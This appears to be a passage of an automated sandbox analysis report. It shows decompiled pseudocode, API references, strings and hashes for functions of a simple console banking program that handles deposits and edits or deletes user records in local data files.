                                                • Part of subcall function 00D870FC: __ftbuf.LIBCMT ref: 00D87176
                                              • _wprintf.LIBCMT ref: 00D8467D
                                              • _wprintf.LIBCMT ref: 00D84693
                                              • _wscanf.LIBCMT ref: 00D846A4
                                              • _wprintf.LIBCMT ref: 00D846BF
                                              • _wprintf.LIBCMT ref: 00D846FA
                                              • _wprintf.LIBCMT ref: 00D84782
                                                • Part of subcall function 00D82080: _wprintf.LIBCMT ref: 00D820F2
                                              Strings
                                              • TEMP.DAT, xrefs: 00D847BC
                                              • %s %s %s %s %s %s %c %s %c %f %f %f, xrefs: 00D8480A
                                              • Deposit to A/C number : , xrefs: 00D845FE
                                              • ACCOUNT.DAT, xrefs: 00D847A5
                                              • Are you sure you want to perform this tranasction? <Y/N>, xrefs: 00D8477D
                                              • ACCOUNT.DAT, xrefs: 00D84621
                                              • Transaction completed successfully!, xrefs: 00D84964
                                              • Cash+Deposited, xrefs: 00D8492B
                                              • %s %s %s %s %s %s %c %s %c %.2f %.2f %.2f, xrefs: 00D848B5
                                              • Given A/C number does not exits!, xrefs: 00D84656
                                              • Confirm Transaction, xrefs: 00D846BA
                                              • %s %s %s %s %.2f %s, xrefs: 00D84934
                                              • TRANSACTION.DAT, xrefs: 00D848F0
                                              • [ %s ], xrefs: 00D84678
                                              • Amount to be Deposited (in NRs.) : , xrefs: 00D8468E
                                              • %s to be deposited in A/C number : %s [ %s ], xrefs: 00D846F5
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.382981299.0000000000D81000.00000020.00020000.sdmp, Offset: 00D80000, based on PE: true
                                              • Associated: 00000002.00000002.382951504.0000000000D80000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.383023162.0000000000D98000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.383040167.0000000000D9F000.00000008.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.383052051.0000000000DA5000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: _wprintf$__wstrtime_wscanf$ConsoleCursorHandlePosition__fsopen__ftbuf__output_s_l__stbuf_vwscanf
                                              • String ID: %s %s %s %s %.2f %s$%s %s %s %s %s %s %c %s %c %.2f %.2f %.2f$%s %s %s %s %s %s %c %s %c %f %f %f$%s to be deposited in A/C number : %s [ %s ]$ACCOUNT.DAT$ACCOUNT.DAT$Amount to be Deposited (in NRs.) : $Are you sure you want to perform this tranasction? <Y/N>$Cash+Deposited$Confirm Transaction$Deposit to A/C number : $Given A/C number does not exits!$TEMP.DAT$TRANSACTION.DAT$Transaction completed successfully!$[ %s ]
                                              • API String ID: 532294799-930819241
                                              • Opcode ID: 4a9a57e43a18420231b7e6bf6ad62de72f5877a7aa9c27ca7f4d16fcf1f445fe
                                              • Instruction ID: eaaf4df6763eb63a024e3b21fd667d9ba0e6a97977d2fc2f8320a572d71afa0a
                                              • Opcode Fuzzy Hash: 4a9a57e43a18420231b7e6bf6ad62de72f5877a7aa9c27ca7f4d16fcf1f445fe
                                              • Instruction Fuzzy Hash: 34914DB2D40308AEDB11FBA58C43EEE7778EF5A710F044259F60566181FA71A64C8BB6
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00D82AB0, Relevance: 51.0, APIs: 15, Strings: 14, Instructions: 243COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 80%
                                              			E00D82AB0(void* __ebx, void* __edi, void* __esi, void* __fp0) {
				char _v5;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v19;
				char _v23;
				char _v27;
				char _v31;
				char _v35;
				char _v39;
				char _v43;
				char _v47;
				char _v48;
				char _v51;
				char _v55;
				char _v59;
				char _v63;
				char _v67;
				char _v71;
				char _v75;
				char _v79;
				char _v80;
				char _v83;
				char _v87;
				char _v91;
				char _v95;
				char _v99;
				char _v103;
				char _v107;
				char _v111;
				char _v112;
				char _v144;
				char _v176;
				char _v208;
				void* __ebp;
				intOrPtr _t66;
				intOrPtr _t67;
				void* _t68;
				intOrPtr _t84;
				intOrPtr _t86;
				intOrPtr _t87;
				void* _t88;
				intOrPtr _t89;
				intOrPtr _t95;
				intOrPtr _t98;
				intOrPtr _t105;
				char _t106;
				void* _t109;
				void* _t110;
				intOrPtr _t119;
				intOrPtr _t130;
				intOrPtr _t132;
				void* _t136;
				void* _t140;
				void* _t141;
				void* _t142;
				void* _t143;
				void* _t149;
				void* _t150;
				void* _t154;

				_t161 = __fp0;
				_t135 = __esi;
				_t134 = __edi;
				_t113 = __ebx;
				_v48 = 0;
				_v47 = 0;
				_v43 = 0;
				_v39 = 0;
				_v35 = 0;
				_v31 = 0;
				_v27 = 0;
				_v23 = 0;
				_v19 = 0;
				_v112 = 0;
				_v111 = 0;
				_v107 = 0;
				_v103 = 0;
				_v99 = 0;
				_v95 = 0;
				_v91 = 0;
				_v87 = 0;
				_v83 = 0;
				_v80 = 0;
				_v79 = 0;
				_v75 = 0;
				_v71 = 0;
				_v67 = 0;
				_v63 = 0;
				_v59 = 0;
				_v55 = 0;
				_v51 = 0;
				_v16 = 0;
				_v12 = 0;
				E00D82080(0, __edi, __esi, 0, __fp0);
				E00D81250(0x19, 8);
				_push("User Name  : ");
				E00D870FC(__ebx, __edi, __esi, 0);
				E00D8732B("%s", 0xda2ee4);
				E00D81250(0x19, 0xa);
				_push("Password  : ");
				E00D870FC(__ebx, __edi, __esi, 0);
				E00D81290(_t134, _t135,  &_v112);
				_t66 = E00D86E91("USER.DAT", "r");
				_t140 = _t136 + 0x18;
				 *0xda2f28 = _t66;
				while(1) {
					_push( &_v144);
					_push( &_v176);
					_t67 =  *0xda2f28; // 0x0
					_t68 = E00D86FC1(_t67, "%s %s %s\n", 0xda2ee0);
					_t141 = _t140 + 0x14;
					if(_t68 == 0xffffffff) {
						break;
					}
					_t109 = E00D881D0(0xda2ee4,  &_v176);
					_t140 = _t141 + 8;
					if(_t109 == 0) {
						_t110 = E00D881D0(0xda2f02,  &_v144);
						_t140 = _t140 + 8;
						if(_t110 == 0) {
							_v16 = _v16 + 1;
						}
					}
				}
				_t116 =  *0xda2f28; // 0x0
				_push(_t116);
				E00D86D56(_t113, _t134, _t135, __eflags);
				_t142 = _t141 + 4;
				E00D82080(_t116, _t134, _t135, __eflags, _t161);
				__eflags = _v16;
				if(__eflags != 0) {
					E00D81250(8, 0xa);
					_push("Are you sure you want to CHANGE user name and/or password? <Y/N> : ");
					E00D870FC(_t113, _t134, _t135, __eflags);
					_t143 = _t142 + 4;
					__eflags = _v5 - 0x59;
					if(__eflags == 0) {
						do {
							L10:
							E00D82080(_t116, _t134, _t135, __eflags, _t161);
							_v12 = 0;
							E00D81250(0x19, 8);
							_push("NEW User Name        : ");
							E00D870FC(_t113, _t134, _t135, __eflags);
							E00D8732B("%s",  &_v208);
							E00D81250(0x19, 0xa);
							_push("NEW Password         : ");
							E00D870FC(_t113, _t134, _t135, __eflags);
							E00D81290(_t134, _t135,  &_v48);
							E00D81250(0x19, 0xc);
							_push("Confirm NEW Password : ");
							E00D870FC(_t113, _t134, _t135, __eflags);
							E00D81290(_t134, _t135,  &_v80);
							_t116 =  &_v80;
							_t84 = E00D881D0( &_v48,  &_v80);
							_t143 = _t143 + 0x1c;
							__eflags = _t84;
							if(__eflags != 0) {
								E00D82080( &_v80, _t134, _t135, __eflags, _t161);
								E00D81250(0xa, 0xa);
								_push(0xd9f710);
								E00D870FC(_t113, _t134, _t135, __eflags);
								_t143 = _t143 + 4;
								_t105 = _v12 + 1;
								__eflags = _t105;
								_v12 = _t105;
							}
							__eflags = _v12;
						} while (__eflags != 0);
						 *0xda2f28 = E00D86E91("USER.DAT", 0xd9f740);
						_t86 = E00D86E91("temp.dat", "a");
						_t149 = _t143 + 0x10;
						 *0xda2f20 = _t86;
						while(1) {
							_push( &_v144);
							_push( &_v176);
							_t87 =  *0xda2f28; // 0x0
							_t88 = E00D86FC1(_t87, "%s %s %s\n", 0xda2ee0);
							_t150 = _t149 + 0x14;
							__eflags = _t88 - 0xffffffff;
							if(__eflags == 0) {
								break;
							}
							_t95 = E00D881D0(0xda2ee4,  &_v176);
							_t154 = _t150 + 8;
							__eflags = _t95;
							if(__eflags != 0) {
								L17:
								_push( &_v144);
								_push( &_v176);
								_push(0xda2ee0);
								_push("%s %s %s\n");
								_t130 =  *0xda2f20; // 0x0
								_push(_t130);
								E00D86EA6(_t113, _t134, _t135, __eflags);
								_t149 = _t154 + 0x14;
								L19:
								continue;
							}
							_t98 = E00D881D0(0xda2f02,  &_v144);
							_t154 = _t154 + 8;
							__eflags = _t98;
							if(__eflags == 0) {
								_push( &_v48);
								_push( &_v208);
								_push(0xda2ee0);
								_push("%s %s %s\n");
								_t132 =  *0xda2f20; // 0x0
								_push(_t132);
								E00D86EA6(_t113, _t134, _t135, __eflags);
								_t149 = _t154 + 0x14;
								goto L19;
							}
							goto L17;
						}
						_t89 =  *0xda2f28; // 0x0
						_push(_t89);
						E00D86D56(_t113, _t134, _t135, __eflags);
						_t119 =  *0xda2f20; // 0x0
						_push(_t119);
						E00D86D56(_t113, _t134, _t135, __eflags);
						E00D82080(_t119, _t134, _t135, __eflags, _t161);
						E00D81250(0x19, 0xa);
						_push("Record has been EDITED successfully!");
						return E00D870FC(_t113, _t134, _t135, __eflags);
					}
					_t106 = _v5;
					__eflags = _t106 - 0x79;
					if(__eflags != 0) {
						return _t106;
					}
					goto L10;
				}
				E00D81250(0xa, 0xa);
				_push(0xd9f640);
				return E00D870FC(_t113, _t134, _t135, __eflags);
			}






























































                                              0x00d82ab0
                                              0x00d82ab0
                                              0x00d82ab0
                                              0x00d82ab0
                                              0x00d82ab9
                                              0x00d82abf
                                              0x00d82ac2
                                              0x00d82ac5
                                              0x00d82ac8
                                              0x00d82acb
                                              0x00d82ace
                                              0x00d82ad1
                                              0x00d82ad4
                                              0x00d82ad7
                                              0x00d82add
                                              0x00d82ae0
                                              0x00d82ae3
                                              0x00d82ae6
                                              0x00d82ae9
                                              0x00d82aec
                                              0x00d82aef
                                              0x00d82af2
                                              0x00d82af5
                                              0x00d82afb
                                              0x00d82afe
                                              0x00d82b01
                                              0x00d82b04
                                              0x00d82b07
                                              0x00d82b0a
                                              0x00d82b0d
                                              0x00d82b10
                                              0x00d82b13
                                              0x00d82b1a
                                              0x00d82b21
                                              0x00d82b2a
                                              0x00d82b2f
                                              0x00d82b34
                                              0x00d82b46
                                              0x00d82b52
                                              0x00d82b57
                                              0x00d82b5c
                                              0x00d82b68
                                              0x00d82b77
                                              0x00d82b7c
                                              0x00d82b7f
                                              0x00d82b84
                                              0x00d82b8a
                                              0x00d82b91
                                              0x00d82b9c
                                              0x00d82ba2
                                              0x00d82ba7
                                              0x00d82bad
                                              0x00000000
                                              0x00000000
                                              0x00d82bbb
                                              0x00d82bc0
                                              0x00d82bc5
                                              0x00d82bd3
                                              0x00d82bd8
                                              0x00d82bdd
                                              0x00d82be5
                                              0x00d82be5
                                              0x00d82bdd
                                              0x00d82be8
                                              0x00d82bea
                                              0x00d82bf0
                                              0x00d82bf1
                                              0x00d82bf6
                                              0x00d82bf9
                                              0x00d82bfe
                                              0x00d82c02
                                              0x00d82c23
                                              0x00d82c28
                                              0x00d82c2d
                                              0x00d82c32
                                              0x00d82c39
                                              0x00d82c3c
                                              0x00d82c4b
                                              0x00d82c4b
                                              0x00d82c4b
                                              0x00d82c50
                                              0x00d82c5b
                                              0x00d82c60
                                              0x00d82c65
                                              0x00d82c79
                                              0x00d82c85
                                              0x00d82c8a
                                              0x00d82c8f
                                              0x00d82c9b
                                              0x00d82ca4
                                              0x00d82ca9
                                              0x00d82cae
                                              0x00d82cba
                                              0x00d82cbf
                                              0x00d82cc7
                                              0x00d82ccc
                                              0x00d82ccf
                                              0x00d82cd1
                                              0x00d82cd3
                                              0x00d82cdc
                                              0x00d82ce1
                                              0x00d82ce6
                                              0x00d82ceb
                                              0x00d82cf1
                                              0x00d82cf1
                                              0x00d82cf4
                                              0x00d82cf4
                                              0x00d82cf7
                                              0x00d82cf7
                                              0x00d82d13
                                              0x00d82d22
                                              0x00d82d27
                                              0x00d82d2a
                                              0x00d82d2f
                                              0x00d82d35
                                              0x00d82d3c
                                              0x00d82d47
                                              0x00d82d4d
                                              0x00d82d52
                                              0x00d82d55
                                              0x00d82d58
                                              0x00000000
                                              0x00000000
                                              0x00d82d6a
                                              0x00d82d6f
                                              0x00d82d72
                                              0x00d82d74
                                              0x00d82d8e
                                              0x00d82d94
                                              0x00d82d9b
                                              0x00d82d9c
                                              0x00d82da1
                                              0x00d82da6
                                              0x00d82dac
                                              0x00d82dad
                                              0x00d82db2
                                              0x00d82ddb
                                              0x00000000
                                              0x00d82ddb
                                              0x00d82d82
                                              0x00d82d87
                                              0x00d82d8a
                                              0x00d82d8c
                                              0x00d82dba
                                              0x00d82dc1
                                              0x00d82dc2
                                              0x00d82dc7
                                              0x00d82dcc
                                              0x00d82dd2
                                              0x00d82dd3
                                              0x00d82dd8
                                              0x00000000
                                              0x00d82dd8
                                              0x00000000
                                              0x00d82d8c
                                              0x00d82de0
                                              0x00d82de5
                                              0x00d82de6
                                              0x00d82dee
                                              0x00d82df4
                                              0x00d82df5
                                              0x00d82dfd
                                              0x00d82e06
                                              0x00d82e0b
                                              0x00000000
                                              0x00d82e15
                                              0x00d82c3e
                                              0x00d82c42
                                              0x00d82c45
                                              0x00d82e1b
                                              0x00d82e1b
                                              0x00000000
                                              0x00d82c45
                                              0x00d82c08
                                              0x00d82c0d
                                              0x00000000

                                              APIs
                                                • Part of subcall function 00D82080: _wprintf.LIBCMT ref: 00D8209F
                                                • Part of subcall function 00D82080: _wprintf.LIBCMT ref: 00D820DE
                                                • Part of subcall function 00D82080: _wprintf.LIBCMT ref: 00D820FF
                                                • Part of subcall function 00D82080: __wstrtime.LIBCMT ref: 00D8210C
                                                • Part of subcall function 00D82080: _wprintf.LIBCMT ref: 00D82128
                                                • Part of subcall function 00D82080: __wstrtime.LIBCMT ref: 00D82135
                                                • Part of subcall function 00D82080: _wprintf.LIBCMT ref: 00D82168
                                                • Part of subcall function 00D81250: GetStdHandle.KERNEL32(000000F5,00000000,?,00D81333,?,?,?,00D811CF), ref: 00D81271
                                                • Part of subcall function 00D81250: SetConsoleCursorPosition.KERNEL32(00000000,?,00D81333,?,?,?,00D811CF), ref: 00D81278
                                              • _wprintf.LIBCMT ref: 00D82B34
                                              • _wscanf.LIBCMT ref: 00D82B46
                                                • Part of subcall function 00D8732B: _vwscanf.LIBCMT ref: 00D8733C
                                              • _wprintf.LIBCMT ref: 00D82B5C
                                                • Part of subcall function 00D870FC: __stbuf.LIBCMT ref: 00D87148
                                                • Part of subcall function 00D870FC: __output_s_l.LIBCMT ref: 00D87162
                                                • Part of subcall function 00D870FC: __ftbuf.LIBCMT ref: 00D87176
                                                • Part of subcall function 00D81290: _wprintf.LIBCMT ref: 00D812C9
                                                • Part of subcall function 00D86E91: __fsopen.LIBCMT ref: 00D86E9C
                                              • _swscanf.LIBCMT ref: 00D82BA2
                                                • Part of subcall function 00D86FC1: _vfscanf.LIBCMT ref: 00D86FD5
                                              • _wprintf.LIBCMT ref: 00D82C12
                                              • _wprintf.LIBCMT ref: 00D82C2D
                                              • _wprintf.LIBCMT ref: 00D82C65
                                              • _wscanf.LIBCMT ref: 00D82C79
                                              • _wprintf.LIBCMT ref: 00D82C8F
                                              • _wprintf.LIBCMT ref: 00D82CAE
                                              • _wprintf.LIBCMT ref: 00D82CE6
                                              • _swscanf.LIBCMT ref: 00D82D4D
                                              • _fprintf.LIBCMT ref: 00D82DAD
                                              • _fprintf.LIBCMT ref: 00D82DD3
                                              • _wprintf.LIBCMT ref: 00D82E10
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.382981299.0000000000D81000.00000020.00020000.sdmp, Offset: 00D80000, based on PE: true
                                              • Associated: 00000002.00000002.382951504.0000000000D80000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.383023162.0000000000D98000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.383040167.0000000000D9F000.00000008.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.383052051.0000000000DA5000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: _wprintf$__wstrtime_fprintf_swscanf_wscanf$ConsoleCursorHandlePosition__fsopen__ftbuf__output_s_l__stbuf_vfscanf_vwscanf
                                              • String ID: %s %s %s$%s %s %s$%s %s %s$%s %s %s$Are you sure you want to CHANGE user name and/or password? <Y/N> : $Confirm NEW Password : $NEW Password : $NEW User Name : $Password : $Record has been EDITED successfully!$USER.DAT$USER.DAT$User Name : $temp.dat
                                              • API String ID: 1431756120-371646773
                                              • Opcode ID: 51ac6857479f5823c20e16eb3f493b862bfeac48b9d212903550c598ff0bae97
                                              • Instruction ID: fbb3a0da68ec9d3429d80fb6f6c1db7c152780cd48688aea98b41e70db56beff
                                              • Opcode Fuzzy Hash: 51ac6857479f5823c20e16eb3f493b862bfeac48b9d212903550c598ff0bae97
                                              • Instruction Fuzzy Hash: 3A814EB1E44304AEEF10FBE59C43FAE7674EF55710F044069F505E6291EAB0A6488B76
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00D827A0, Relevance: 44.0, APIs: 11, Strings: 14, Instructions: 223COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 75%
                                              			E00D827A0(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __fp0) {
				char _v5;
				intOrPtr _v12;
				char _v20;
				char _v23;
				char _v27;
				char _v31;
				char _v35;
				char _v39;
				char _v43;
				char _v47;
				char _v51;
				char _v52;
				char _v84;
				char _v116;
				char _v129;
				char _v139;
				char _v154;
				char _v188;
				void* __ebp;
				intOrPtr _t47;
				void* _t49;
				char _t54;
				intOrPtr _t56;
				void* _t58;
				intOrPtr _t62;
				void* _t65;
				intOrPtr _t67;
				intOrPtr _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				intOrPtr _t83;
				void* _t86;
				void* _t88;
				intOrPtr _t92;
				intOrPtr _t93;
				intOrPtr _t94;
				intOrPtr _t96;
				intOrPtr _t99;
				intOrPtr _t105;
				intOrPtr _t107;
				intOrPtr _t109;
				void* _t118;
				void* _t122;
				void* _t123;
				void* _t124;
				void* _t125;
				void* _t127;
				void* _t128;
				void* _t132;
				void* _t133;
				void* _t139;

				_t146 = __fp0;
				_t117 = __esi;
				_t116 = __edi;
				_t89 = __ebx;
				_v52 = 0;
				_v51 = 0;
				_v47 = 0;
				_v43 = 0;
				_v39 = 0;
				_v35 = 0;
				_v31 = 0;
				_v27 = 0;
				_v23 = 0;
				_v12 = 0;
				E00D82080(__ecx, __edi, __esi, 0, __fp0);
				E00D81250(0x19, 8);
				_push("User Name  : ");
				E00D870FC(__ebx, __edi, __esi, 0);
				E00D8732B("%s", 0xda2ee4);
				E00D81250(0x19, 0xa);
				_push("Password  : ");
				E00D870FC(__ebx, __edi, __esi, 0);
				E00D81290(_t116, _t117,  &_v52);
				_t47 = E00D86E91("USER.DAT", "r");
				_t122 = _t118 + 0x18;
				 *0xda2f28 = _t47;
				while(1) {
					_push( &_v116);
					_push( &_v84);
					_t92 =  *0xda2f28; // 0x0
					_t49 = E00D86FC1(_t92, "%s %s %s\n", 0xda2ee0);
					_t123 = _t122 + 0x14;
					if(_t49 == 0xffffffff) {
						break;
					}
					_t86 = E00D881D0(0xda2ee4,  &_v84);
					_t122 = _t123 + 8;
					if(_t86 == 0) {
						_t88 = E00D881D0(0xda2f02,  &_v116);
						_t122 = _t122 + 8;
						if(_t88 == 0) {
							_v12 = _v12 + 1;
						}
					}
				}
				_t105 =  *0xda2f28; // 0x0
				_push(_t105);
				E00D86D56(_t89, _t116, _t117, __eflags);
				_t124 = _t123 + 4;
				E00D82080(_t92, _t116, _t117, __eflags, _t146);
				__eflags = _v12;
				if(__eflags != 0) {
					E00D81250(0xf, 0xa);
					_push("Are you sure you want to DELETE this user? <Y/N> : ");
					E00D870FC(_t89, _t116, _t117, __eflags);
					_t125 = _t124 + 4;
					_t54 = _v5;
					__eflags = _t54 - 0x59;
					if(_t54 == 0x59) {
						L10:
						 *0xda2f28 = E00D86E91("USER.DAT", "r");
						_t56 = E00D86E91("temp.dat", "a");
						_t127 = _t125 + 0x10;
						 *0xda2f20 = _t56;
						while(1) {
							_push( &_v116);
							_push( &_v84);
							_t93 =  *0xda2f28; // 0x0
							_t58 = E00D86FC1(_t93, "%s %s %s\n", 0xda2ee0);
							_t128 = _t127 + 0x14;
							__eflags = _t58 - 0xffffffff;
							if(__eflags == 0) {
								break;
							}
							_t79 = E00D881D0(0xda2ee4,  &_v84);
							_t139 = _t128 + 8;
							__eflags = _t79;
							if(__eflags != 0) {
								L14:
								_push( &_v116);
								_push( &_v84);
								_push(0xda2ee0);
								_push("%s %s %s\n");
								_t80 =  *0xda2f20; // 0x0
								_push(_t80);
								E00D86EA6(_t89, _t116, _t117, __eflags);
								_t127 = _t139 + 0x14;
								L15:
								continue;
							}
							_t83 = E00D881D0(0xda2f02,  &_v116);
							_t127 = _t139 + 8;
							__eflags = _t83;
							if(__eflags == 0) {
								goto L15;
							}
							goto L14;
						}
						_t94 =  *0xda2f28; // 0x0
						_push(_t94);
						E00D86D56(_t89, _t116, _t117, __eflags);
						_t107 =  *0xda2f20; // 0x0
						_push(_t107);
						E00D86D56(_t89, _t116, _t117, __eflags);
						 *0xda2f28 = E00D86E91("LOG.DAT", "r");
						_t62 = E00D86E91("temp.dat", "w");
						_t132 = _t128 + 0x18;
						 *0xda2f20 = _t62;
						while(1) {
							_push( &_v129);
							_push( &_v139);
							_push( &_v154);
							_t96 =  *0xda2f28; // 0x0
							_t65 = E00D86FC1(_t96, "%s %s %s %s",  &_v188);
							_t133 = _t132 + 0x18;
							__eflags = _t65 - 0xffffffff;
							if(__eflags == 0) {
								break;
							}
							E00D97C92( &_v188);
							E00D97C92( &_v20);
							_t75 = E00D881D0( &_v188,  &_v20);
							_t132 = _t133 + 0x10;
							__eflags = _t75;
							if(__eflags != 0) {
								_push( &_v129);
								_push( &_v139);
								_push( &_v154);
								_push( &_v188);
								_push("%s %s %s %s\n");
								_t99 =  *0xda2f20; // 0x0
								_push(_t99);
								E00D86EA6(_t89, _t116, _t117, __eflags);
								_t132 = _t132 + 0x18;
							}
						}
						_t109 =  *0xda2f28; // 0x0
						_push(_t109);
						E00D86D56(_t89, _t116, _t117, __eflags);
						_t67 =  *0xda2f20; // 0x0
						_push(_t67);
						E00D86D56(_t89, _t116, _t117, __eflags);
						E00D82080(_t96, _t116, _t117, __eflags, _t146);
						E00D81250(0x19, 0xa);
						_push("Record DELETED successfully!");
						return E00D870FC(_t89, _t116, _t117, __eflags);
					}
					__eflags = _v5 - 0x79;
					if(_v5 != 0x79) {
						return _t54;
					}
					goto L10;
				}
				E00D81250(0xa, 0xa);
				_push(0xd9f4fc);
				return E00D870FC(_t89, _t116, _t117, __eflags);
			}






















































                                              0x00d827a0
                                              0x00d827a0
                                              0x00d827a0
                                              0x00d827a0
                                              0x00d827a9
                                              0x00d827af
                                              0x00d827b2
                                              0x00d827b5
                                              0x00d827b8
                                              0x00d827bb
                                              0x00d827be
                                              0x00d827c1
                                              0x00d827c4
                                              0x00d827c7
                                              0x00d827ce
                                              0x00d827d7
                                              0x00d827dc
                                              0x00d827e1
                                              0x00d827f3
                                              0x00d827ff
                                              0x00d82804
                                              0x00d82809
                                              0x00d82815
                                              0x00d82824
                                              0x00d82829
                                              0x00d8282c
                                              0x00d82831
                                              0x00d82834
                                              0x00d82838
                                              0x00d82843
                                              0x00d8284a
                                              0x00d8284f
                                              0x00d82855
                                              0x00000000
                                              0x00000000
                                              0x00d82860
                                              0x00d82865
                                              0x00d8286a
                                              0x00d82875
                                              0x00d8287a
                                              0x00d8287f
                                              0x00d82887
                                              0x00d82887
                                              0x00d8287f
                                              0x00d8288a
                                              0x00d8288c
                                              0x00d82892
                                              0x00d82893
                                              0x00d82898
                                              0x00d8289b
                                              0x00d828a0
                                              0x00d828a4
                                              0x00d828c5
                                              0x00d828ca
                                              0x00d828cf
                                              0x00d828d4
                                              0x00d828d7
                                              0x00d828db
                                              0x00d828de
                                              0x00d828ed
                                              0x00d828ff
                                              0x00d8290e
                                              0x00d82913
                                              0x00d82916
                                              0x00d8291b
                                              0x00d8291e
                                              0x00d82922
                                              0x00d8292d
                                              0x00d82934
                                              0x00d82939
                                              0x00d8293c
                                              0x00d8293f
                                              0x00000000
                                              0x00000000
                                              0x00d8294a
                                              0x00d8294f
                                              0x00d82952
                                              0x00d82954
                                              0x00d8296b
                                              0x00d8296e
                                              0x00d82972
                                              0x00d82973
                                              0x00d82978
                                              0x00d8297d
                                              0x00d82982
                                              0x00d82983
                                              0x00d82988
                                              0x00d8298b
                                              0x00000000
                                              0x00d8298b
                                              0x00d8295f
                                              0x00d82964
                                              0x00d82967
                                              0x00d82969
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00d82969
                                              0x00d8298d
                                              0x00d82993
                                              0x00d82994
                                              0x00d8299c
                                              0x00d829a2
                                              0x00d829a3
                                              0x00d829bd
                                              0x00d829cc
                                              0x00d829d1
                                              0x00d829d4
                                              0x00d829d9
                                              0x00d829dc
                                              0x00d829e3
                                              0x00d829ea
                                              0x00d829f7
                                              0x00d829fe
                                              0x00d82a03
                                              0x00d82a06
                                              0x00d82a09
                                              0x00000000
                                              0x00000000
                                              0x00d82a12
                                              0x00d82a1e
                                              0x00d82a31
                                              0x00d82a36
                                              0x00d82a39
                                              0x00d82a3b
                                              0x00d82a40
                                              0x00d82a47
                                              0x00d82a4e
                                              0x00d82a55
                                              0x00d82a56
                                              0x00d82a5b
                                              0x00d82a61
                                              0x00d82a62
                                              0x00d82a67
                                              0x00d82a67
                                              0x00d82a6a
                                              0x00d82a6f
                                              0x00d82a75
                                              0x00d82a76
                                              0x00d82a7e
                                              0x00d82a83
                                              0x00d82a84
                                              0x00d82a8c
                                              0x00d82a95
                                              0x00d82a9a
                                              0x00000000
                                              0x00d82aa4
                                              0x00d828e4
                                              0x00d828e7
                                              0x00d82aaa
                                              0x00d82aaa
                                              0x00000000
                                              0x00d828e7
                                              0x00d828aa
                                              0x00d828af
                                              0x00000000

                                              APIs
                                                • Part of subcall function 00D82080: _wprintf.LIBCMT ref: 00D8209F
                                                • Part of subcall function 00D82080: _wprintf.LIBCMT ref: 00D820DE
                                                • Part of subcall function 00D82080: _wprintf.LIBCMT ref: 00D820FF
                                                • Part of subcall function 00D82080: __wstrtime.LIBCMT ref: 00D8210C
                                                • Part of subcall function 00D82080: _wprintf.LIBCMT ref: 00D82128
                                                • Part of subcall function 00D82080: __wstrtime.LIBCMT ref: 00D82135
                                                • Part of subcall function 00D82080: _wprintf.LIBCMT ref: 00D82168
                                                • Part of subcall function 00D81250: GetStdHandle.KERNEL32(000000F5,00000000,?,00D81333,?,?,?,00D811CF), ref: 00D81271
                                                • Part of subcall function 00D81250: SetConsoleCursorPosition.KERNEL32(00000000,?,00D81333,?,?,?,00D811CF), ref: 00D81278
                                              • _wprintf.LIBCMT ref: 00D827E1
                                              • _wscanf.LIBCMT ref: 00D827F3
                                                • Part of subcall function 00D8732B: _vwscanf.LIBCMT ref: 00D8733C
                                              • _wprintf.LIBCMT ref: 00D82809
                                                • Part of subcall function 00D870FC: __stbuf.LIBCMT ref: 00D87148
                                                • Part of subcall function 00D870FC: __output_s_l.LIBCMT ref: 00D87162
                                                • Part of subcall function 00D870FC: __ftbuf.LIBCMT ref: 00D87176
                                                • Part of subcall function 00D81290: _wprintf.LIBCMT ref: 00D812C9
                                                • Part of subcall function 00D86E91: __fsopen.LIBCMT ref: 00D86E9C
                                              • _swscanf.LIBCMT ref: 00D8284A
                                                • Part of subcall function 00D86FC1: _vfscanf.LIBCMT ref: 00D86FD5
                                              • _wprintf.LIBCMT ref: 00D828B4
                                              • _wprintf.LIBCMT ref: 00D828CF
                                              • _swscanf.LIBCMT ref: 00D82934
                                              • _fprintf.LIBCMT ref: 00D82983
                                              • _swscanf.LIBCMT ref: 00D829FE
                                              • _fprintf.LIBCMT ref: 00D82A62
                                              • _wprintf.LIBCMT ref: 00D82A9F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.382981299.0000000000D81000.00000020.00020000.sdmp, Offset: 00D80000, based on PE: true
                                              • Associated: 00000002.00000002.382951504.0000000000D80000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.383023162.0000000000D98000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.383040167.0000000000D9F000.00000008.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.383052051.0000000000DA5000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: _wprintf$_swscanf$__wstrtime_fprintf$ConsoleCursorHandlePosition__fsopen__ftbuf__output_s_l__stbuf_vfscanf_vwscanf_wscanf
                                              • String ID: %s %s %s$%s %s %s$%s %s %s$%s %s %s %s$%s %s %s %s$Are you sure you want to DELETE this user? <Y/N> : $LOG.DAT$Password : $Record DELETED successfully!$USER.DAT$USER.DAT$User Name : $temp.dat$temp.dat
                                              • API String ID: 3163849712-4002591224
                                              • Opcode ID: d77a4ce0df7e94517bd262ddd61b831d137c6634126c92e2eeacb83862d2c8a7
                                              • Instruction ID: ebc662dde98d650a55fce4b554007d6bfea1d102a014fdeb74a252b806e3ed64
                                              • Opcode Fuzzy Hash: d77a4ce0df7e94517bd262ddd61b831d137c6634126c92e2eeacb83862d2c8a7
                                              • Instruction Fuzzy Hash: 39719DB2E40304AEDB11FBA5DC43FBE3278AF15710F584129F905E6281FA71E6088B72
                                              Uniqueness

                                              Uniqueness Score: -1.00%

